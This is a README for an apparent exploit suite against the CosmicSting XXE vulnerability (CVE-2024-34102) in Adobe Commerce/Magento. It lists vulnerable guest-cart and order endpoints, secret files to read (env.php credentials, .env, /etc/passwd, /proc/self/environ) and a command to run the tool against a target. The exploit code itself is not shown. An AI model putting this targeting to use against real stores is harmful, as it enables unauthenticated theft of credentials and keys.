russellwork2021-lgtm/cosmicsting-cve-2024-34102-exploit

# CosmicSting (CVE-2024-34102) Exploit Suite Complete exploit suite for **CVE-2024-34102** - The CosmicSting XXE vulnerability in Adobe Commerce / Magento 2.4.x. ## Vulnerability Details - **CVE**: CVE-2024-34102 (CVSS 9.8) - **Type**: XML External Entity Injection (XXE) - **Impact**: Unauthenticated remote file read, SSRF, potential RCE - **Affected**: Adobe Commerce 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier ## Attack Vectors Tested | Vector | Endpoint | |--------|----------| | Standard XXE | `/rest/V1/guest-carts/{id}/estimate-shipping-methods` | | Standard XXE (all) | `/rest/all/V1/guest-carts/{id}/estimate-shipping-methods` | | Billing Address | `/rest/V1/guest-carts/{id}/billing-address` | | dataIsURL | Same endpoints with `dataIsURL: true` | | totalsReader | Alternative JSON structure | | Orders | `/rest/V1/orders`, `/rest/V1/order` | | Direct path | `/app/etc/env.php`, `/.env`, etc. | ## Files Targeted - `app/etc/env.php` (database credentials, encryption keys) - `.env` (environment variables) - `/etc/passwd` (user enumeration) - `/etc/hosts` (internal network mapping) - `/proc/self/environ` (process environment) - `app/etc/config.php`, `app/etc/config.local.php` - `var/log/system.log`, `var/log/exception.log` ## Usage pip install requests python3 cosmicsting-cve-2024-34102.py https://target.com ## References - [AssetNote Research](https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102) - [Sansec CosmicSting](https://sansec.io/research/cosmicsting) - [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator) - [EQSTLab/CVE-2024-34102](https://github.com/EQSTLab/CVE-2024-34102) - [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102) - [Nuclei Template](https://github.com/projectdiscovery/nuclei-templates) - [Ambionics CNEXT + CosmicSting RCE](https://github.com/ambionics/cnext-exploits) - [SpaceWasp Writeup](https://github.com/spacewasp/public_docs)